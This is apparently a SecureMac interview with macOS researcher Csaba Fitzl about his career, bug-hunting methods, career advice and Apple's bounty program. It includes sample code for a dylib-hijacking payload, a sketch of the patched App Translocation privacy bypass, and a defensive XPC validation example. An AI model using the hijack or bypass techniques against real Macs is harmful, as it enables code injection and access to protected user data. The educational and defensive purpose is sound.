When Csaba Fitzl graduated from university with a degree in computer engineering, he wasn’t planning to go into cybersecurity at all. His first professional role was as a network support technician for Cisco, followed by several years as a network engineer at ExxonMobil.
But when an old friend from university told Fitzl what he’d been up to, his interest was piqued:
CF: I had a friend who was in security, and we used to meet regularly to keep in touch. And one day, he said, “Hey, I just became a ‘certified ethical hacker’; I got certified by the EC-Council”. And I thought, “Hmm … that sounds cool!” So I went to do the CEH training that we had in Hungary at the time. It was just an introductory thing, like five days, but it was really eye-opening.
Fitzl continued his studies in cybersecurity on the side, in addition to his regular IT work, until one day he was offered an opportunity to take on a security role at his company:
CF: I joined a blue team that had been formed in Budapest, and stayed in that role for about six years: hunting for adversaries, doing incident response, and so on. But actually, except in maybe one or two cases, all of the training I did was on the offensive side. That was what interested me much more than blue team work. And after some time, I actually got to switch to a red team at Exxon.
Like that of many people in the world of information security, Fitzl’s career path wasn’t always straightforward, and it involved a great deal of self-study. This was doubly true of his move to macOS security, an area of interest that he started pursuing in his spare time, without any formal training:
I somehow drifted to macOS and learned everything from blog posts, conference talks, and books.
CF: I was always a Windows guy. Most of the training in enterprise cybersecurity, pretty much wherever you go, focuses on Windows environments.
But we had this Mac for lab use, and I don’t know why exactly, but I got interested in trying some macOS stuff. I started with Patrick Wardle’s DEF CON talk about DLL Hijacking on OS X, and I began hunting for dylib hijacking vulnerabilities on macOS. And aside from finding a few, I also went down the rabbit hole and found a vulnerability in macOS itself where I could gain root access by installing an application from the App Store.
So basically, I somehow drifted to macOS and learned everything from blog posts, conference talks, and books like Jonathan Levin’s OS Internals. Back then there was no formal training — not really — for macOS security.
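For readers who haven’t encountered the technique, dylib hijacking is conceptually simple: an application searches for a dynamic library in a location that an attacker can write to, and if the attacker plants a library with the expected name there, the application loads it and runs the attacker’s code with the application’s own privileges. The sketch below (a hypothetical payload, not code from Fitzl’s research) shows how little the planted library actually needs to contain:

```c
/*
 * hijack.c -- a minimal illustration of the payload side of dylib hijacking.
 * The library and target names are hypothetical. Build as a dynamic library
 * and plant it where a vulnerable application expects (but fails to find,
 * or fails to validate) one of its dylibs:
 *
 *     clang -dynamiclib hijack.c -o libVictimExpectsThis.dylib
 */
#include <stdlib.h>   /* getprogname() */
#include <syslog.h>

__attribute__((constructor))
static void on_load(void)
{
    /* This constructor runs automatically inside the host application's
     * process as soon as the library is loaded, with that process's
     * privileges. A real payload would do something more interesting
     * than logging. */
    syslog(LOG_NOTICE, "dylib loaded into process: %s", getprogname());
}
```

On modern versions of macOS, the hardened runtime and library validation will refuse to load a third-party dylib like this unless the application explicitly opts out, which is one reason this class of bug is less common today than when Wardle first described it.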
Over the past several years, Fitzl has established himself within the security research community. He has found a number of other macOS vulnerabilities, and has spoken at several important cybersecurity conferences, including Black Hat USA and Objective by the Sea.
But to people outside of the community, the activity of bug hunting can often seem somewhat mysterious. When an everyday user hears that a security researcher has “discovered a bug” in their OS, they may find themselves wondering how that researcher ever knew where to look for it in the first place!
As Fitzl describes it, however, his research methodology follows a fairly logical process:
I try to think: OK, so this is how it works. What happens if I change something?
CF: I start by trying to understand how things work on macOS — or at least, how they’re supposed to work.
Once I’ve done that, I try to think, OK, so this is how it works. What happens if I change something in the workflow? Or what if there’s a legitimate feature of macOS that I can abuse? And sometimes it just so happens that there is!
One example would be the App Translocation bug that I covered in my Black Hat talk, and which I will also cover at Objective by the Sea. There is a macOS feature called App Translocation. Here’s how it works. Let’s say you download an application from the Internet, but instead of moving it to the Applications directory, you start it right away from the Downloads folder. macOS won’t move the app — it will mount it at another location and run it from there. This was actually introduced to mitigate a bug found by Patrick Wardle, and it’s a legitimate macOS feature.
Now, as many users probably know, macOS has privacy protections that lock down locations where sensitive user data is stored: Documents, Messages, Contacts, and so on. And I thought: OK, could I use the App Translocation feature to translocate, to “move”, the Documents folder, or the Contacts folder, to a different location — a location that isn’t under privacy protection? And it turned out that you could do that. So again, if you understand how things work on macOS, then you can begin to see how to use those things in a way they weren’t intended to be used!
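The mechanics can be sketched in a few lines of C. To be clear, this is a simplified reconstruction rather than Fitzl’s exploit code: SecTranslocateCreateSecureDirectoryForURL is a private Security.framework symbol whose name and signature are assumed here from Apple’s open-source Security releases, the target path is purely illustrative, and the underlying bug has since been patched.

```c
/*
 * translocate_sketch.c -- simplified sketch of the idea behind the App
 * Translocation privacy bypass described above. Not working exploit code:
 * the function below is a private Security.framework symbol (name and
 * signature assumed from Apple's open-source Security releases), and
 * Apple has since fixed the underlying issue.
 *
 *     clang translocate_sketch.c -framework CoreFoundation -o sketch
 */
#include <CoreFoundation/CoreFoundation.h>
#include <dlfcn.h>

/* Assumed signature of the private translocation helper. */
typedef CFURLRef (*SecTranslocateCreate_t)(CFURLRef pathToTranslocate,
                                           CFURLRef destinationPath,
                                           CFErrorRef *error);

int main(void)
{
    void *security = dlopen(
        "/System/Library/Frameworks/Security.framework/Security", RTLD_LAZY);
    if (security == NULL) {
        return 1;
    }

    SecTranslocateCreate_t translocate = (SecTranslocateCreate_t)dlsym(
        security, "SecTranslocateCreateSecureDirectoryForURL");
    if (translocate == NULL) {
        return 1;
    }

    /* The core idea of the original bug: ask the translocation machinery
     * to "translocate" a privacy-protected folder instead of a quarantined
     * app bundle. The resulting mount point exposed the same files at a
     * path that the privacy protections did not cover. The path here is
     * illustrative. */
    CFURLRef docs = CFURLCreateWithFileSystemPath(
        NULL, CFSTR("/Users/someuser/Documents"), kCFURLPOSIXPathStyle, true);

    CFErrorRef error = NULL;
    CFURLRef mounted = translocate(docs, NULL, &error);
    if (mounted != NULL) {
        CFShow(mounted);   /* prints the new mount location */
        CFRelease(mounted);
    }
    CFRelease(docs);
    return 0;
}
```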
In addition, says Fitzl, some types of bugs tend to occur in predictable ways. Once a researcher knows what they’re looking for — or just where to look — they can speed up the process of finding new bugs:
CF: There are patterns for finding bugs. For example, XPC bugs. There are fewer of them these days, but security researchers found lots and lots of privilege escalation bugs just by abusing XPC services — especially in third-party software. And there was a regular pattern to how you would find those vulnerabilities.
Basically, a vulnerable app would lack some sort of validation, or would have a validation issue. And you could just open up any third-party app, look at the XPC service, and quickly determine if it was vulnerable or not. So that’s another way to do bug hunting: If you have a pattern for a bug, you can basically look for the same type of bug horizontally, on other services, applications, and even on macOS itself.
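To make the pattern concrete, the defensive side of the check looks roughly like the sketch below: before a privileged XPC service accepts a connection, it should verify who is connecting, for example by enforcing a code signing requirement on the peer. The Mach service name and requirement string here are hypothetical, and the libxpc call shown (xpc_connection_set_peer_code_signing_requirement) is available only on recent macOS releases; on older systems the same validation is typically done by hand against the client’s audit token. A service that skips this step entirely is exactly the kind of easy target Fitzl describes.

```c
/*
 * helper_sketch.c -- a rough sketch of the client validation whose absence
 * makes many third-party XPC helpers exploitable. The Mach service name and
 * the code signing requirement string are hypothetical.
 *
 *     clang helper_sketch.c -o helper_sketch
 */
#include <xpc/xpc.h>
#include <dispatch/dispatch.h>

int main(void)
{
    xpc_connection_t listener = xpc_connection_create_mach_service(
        "com.example.privileged-helper", NULL,
        XPC_CONNECTION_MACH_SERVICE_LISTENER);

    xpc_connection_set_event_handler(listener, ^(xpc_object_t peer) {
        if (xpc_get_type(peer) != XPC_TYPE_CONNECTION) {
            return;
        }
        xpc_connection_t client = (xpc_connection_t)peer;

        /* The check that vulnerable helpers are missing: only accept
         * messages from a client that satisfies a code signing
         * requirement. Without this (or an equivalent audit-token-based
         * check), any local process can drive the privileged helper. */
        if (xpc_connection_set_peer_code_signing_requirement(
                client,
                "anchor apple generic and identifier \"com.example.app\"") != 0) {
            xpc_connection_cancel(client);
            return;
        }

        xpc_connection_set_event_handler(client, ^(xpc_object_t message) {
            /* ... handle messages from the validated client here ... */
            (void)message;
        });
        xpc_connection_resume(client);
    });

    xpc_connection_resume(listener);
    dispatch_main();
}
```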
When he’s not hunting for new macOS vulnerabilities, Fitzl works as a content creator at Offensive Security, a well-regarded cybersecurity training company. He has authored a macOS security training course called “macOS Control Bypasses”, which covers security, vulnerability research, and penetration testing on macOS. The course is an attempt to provide others with the kind of formal training and guidance that was lacking when he first started learning macOS security.
Through his work at Offensive Security, Fitzl has become deeply involved in helping students and career changers who are looking to get into cybersecurity — and he has some advice for those entering the field:
If you’re going to go into cybersecurity, you need to understand that you’re signing up for a process of heavy, lifelong learning.
CF: If you’re going to go into cybersecurity, you need to understand that you’re signing up for a process of heavy, lifelong learning. So you need to be OK with that — and you need to be curious!
I also hear many people say that they want to go straight to security without even having an IT background. But in my opinion, you need to have a strong foundation in IT before you go into security. You need to know how the infrastructure works — how everything works together at a high level. You need some basic programming skills. You don’t have to be a developer, but you need to understand code. Even if you’re doing red team stuff, you’re going to need to interact with lots of different systems, and you need to be able to find bugs in various software and infrastructure components.
So learn at least the basics first, and then go into security. Because if you don’t know how all of the underlying stuff works, you may have some quick wins in the beginning, but it’s not going to work out well in the long run.
For people who already have a background in IT, or even in computer security, getting involved in vulnerability research may be a good option. However, as Fitzl points out, it’s a vast field, and it can be difficult to know what you want to do when you’re just starting out. Because of this, he recommends taking a broad approach in the beginning:
CF: If you’re ready to get into vulnerability research, I’d suggest starting with a general, introductory offensive training. There are tons of these. Go for one that covers a lot of different topics. For example, I’m working at Offensive Security right now, and they offer a foundational course called “Penetration Testing with Kali Linux” (PWK). PWK covers some binary exploitation, some web stuff, some SQL stuff, Active Directory — a little bit of everything. Start with something like that, and just see what interests you. You may realize that you’re more interested in binary exploitation than application pentesting. On the other hand, some people don’t really care about binary exploitation; they want to do web pentesting. So do an introductory training, and then pick a field you’re interested in and start specializing in that.
With cybersecurity skills in such high demand, the field is attractive to both students and career changers. It’s certainly a good time to get involved in security, and in many countries, there is support for training and recruitment at the highest levels of government.
But many people who enter the world of infosec find it to be an intimidating place. In particular, people who work in cybersecurity — even those who have been doing it for some time — often report that they suffer from “impostor syndrome”. Impostor syndrome is a term used by psychologists to describe the experience of doubting one’s own skills and abilities, coupled with an overwhelming fear of being exposed as a fraud.
Fitzl is well aware of the phenomenon, and has some thoughts on how to deal with it:
CF: If you work in cybersecurity, you can always find someone who you feel is more clever than you, or more accomplished, or who is just generally more awesome than you are. And that feeling doesn’t go away. You can always feel that maybe you’re “dumb” or you’re “not good enough”.
To fight impostor syndrome, you need to take the time to appreciate yourself.
I think part of the issue is that as you learn more, you start to see more of what you don’t know. It’s as if the “what you don’t know” is increasing. It isn’t, of course: Your knowledge is actually growing. But because you’re realizing, “Hey, I don’t know this”, and “Oh, I don’t know that”, you can sometimes feel as if you know less than you did when you started!
For me, what helps is to try to look back regularly and take stock of what I’ve achieved: this certification, that bug I found, or even just work accomplishments. To fight impostor syndrome, I think you actually need to take the time to appreciate yourself!
In addition, Fitzl cautions against attempting to achieve “complete” cybersecurity knowledge (which he says is an unattainable ideal anyway) at the expense of everything else in life:
CF: Alex Ionescu had a really interesting talk at OffensiveCon a couple of years ago about his career. Ionescu is a true security expert. He worked on ReactOS, and he’s done lots of reverse engineering on Windows. If you want to learn Windows internals, his name is probably the first one that comes up. And one of the things he said in his talk was that, yes, he became this real expert on Windows — but it came at a cost. It affected his life. And this is something else that people need to consider.
You need to realize that you can devote all of your time to learning this stuff and you will still never “finish”. It’s impossible. For example, I’m focused on macOS now; I’m not really doing Windows anymore. And that means that my knowledge of Windows will start to fade away. I’m just not keeping up to date in that field. But I’ve accepted that, because, well, I’m doing macOS now. That’s my focus. Windows isn’t. At some point, you need to just let it go.
And you know what? Maybe you don’t want to only do computer security. Maybe you want to have time off to do other things. I enjoy hiking. I like being away from the computer. Now, that does mean that you’ll learn less about security. But if you’re like most people, you need to have some kind of work–life balance. There are people who genuinely enjoy doing security all of the time — and if you’re one of those people, there’s nothing wrong with that, don’t get me wrong. But you have to decide what you want for your life.
After nearly a decade in cybersecurity, Fitzl has seen quite a few changes in the field. And through his work on macOS security, he’s had the opportunity to observe firsthand how Apple’s relationship with the third-party security research community has evolved over time.
In general, Fitzl says, “Apple has improved,” but he believes that the company could still do much more to strengthen their relationship with security researchers:
CF: I think they could be more open about how they do things. For example, they could document much more. They used to have pretty good developer documentation in the past, which security researchers could learn a lot from. But many of the existing documents date back 8-10 years now, and they aren’t being refreshed anymore. It would be nice to see them updated.
Apple should engage more with researchers — and be more open.
It’s also nice that they open-source some of the kernel and a few other libraries, but that set is shrinking. It would be great if they kept the same set of components open source over time. For example, launchd, the main process on macOS, used to be open source until a couple of years ago, but now it’s proprietary again.
And frankly, they should stop suing companies like Corellium. I understand that maybe Apple’s lawyers can find some legal justification for it, but they should really stop doing this. It’s just a really bad look. In general, they should engage more with researchers and be more open.
In recent years, one of the biggest changes to the way that Apple works with security researchers has been the introduction of a bug bounty program for macOS. As the discoverer of a number of macOS vulnerabilities, Fitzl is intimately acquainted with the program — and says that here too, there are some opportunities for improvement:
CF: The Apple Security Bounty (ASB) program is OK, at least in that they do pay a lot of money. But they are really, really slow in evaluating whether a researcher is eligible for a bounty or not. I still have bugs that were fixed in the very first release of Big Sur, last November, and they still haven’t decided whether those bugs are eligible for a bounty or not. And it’s not just me. I’ve talked with other people who are working with ASB, and everyone is in the same boat. This is another place where they could really improve.
In fairness, it’s not like they’re “running away”. Eventually, people will get paid. But it just takes an inordinate amount of time. And if you stand to earn $10,000 for a bug, or even $50,000, which is what they offer for certain vulnerabilities, well, if you had that money one year earlier, you could invest it, or do something with it. You’re basically losing money by not getting the bounty in a timely fashion.
Lastly, Apple sometimes takes a really long time to fix bugs — easily over a year or a year and a half in some cases. I have bugs that I reported in Catalina … which will be fixed in Monterey!
Despite some frustrations with the way that Apple engages with third-party researchers, Fitzl is still optimistic about macOS platform security: “In general, I think Apple security is improving. They’re adding some nice features, and they have a good general approach to security”.
However, Fitzl worries that some recent changes in macOS may end up hindering security professionals who want to keep Mac users safe:
The Mac is becoming more and more locked down, but that’s a double-edged sword.
CF: The Mac is becoming more and more locked down. For example, they started to deprecate kernel extensions. I understand the reasoning behind that, because third-party kernel extensions tend to have a ton of bugs. On Windows, for example, there are thousands of vulnerabilities in kernel drivers that can be used to gain kernel privileges.
But it’s a double-edged sword. I worry that the Mac will one day become like the iPhone. I worry that we’ll end up in an iOS-like situation on macOS, where it’s hard to even investigate if a Mac is compromised or not, or to catch things like kernel rootkits — for the simple reason that you can’t install a kernel extension to detect rootkits living in your kernel! I do understand the approach. But it brings in other risks.
While Fitzl thinks that macOS security is headed in the right general direction, he also says that he expects to see an increase in macOS malware in the future:
CF: We’re going to see Mac malware increase, because macOS is becoming more and more popular. The only reason we don’t see much Linux malware is that Linux has maybe 1% of the consumer OS market. For malware authors, there’s just no financial benefit to writing malware for Linux. But if Linux were more popular, I’m absolutely certain that it would have more malware.
There’s no such thing as perfect security. It doesn’t matter what platform you’re using. Windows, macOS, Linux — they’ll all have vulnerabilities. You can be exploited on any platform. So yes, Mac security is improving. But we’re going to continue to see macOS malware. We’re going to continue to see vulnerabilities for macOS. It’s a never-ending cat-and-mouse game.
SecureMac would like to thank Csaba Fitzl for taking the time to talk with us. To learn more about Fitzl and his work, visit his technical blog or follow him on Twitter. To see what he does when he’s not doing cybersecurity, check out his hiking and photography blog.
Csaba Fitzl will discuss mount operation internals and related vulnerabilities at Objective by the Sea 4.0 in a talk entitled “Mount(ain) of Bugs”. For details on how to watch the conference live stream, please see the Objective by the Sea website.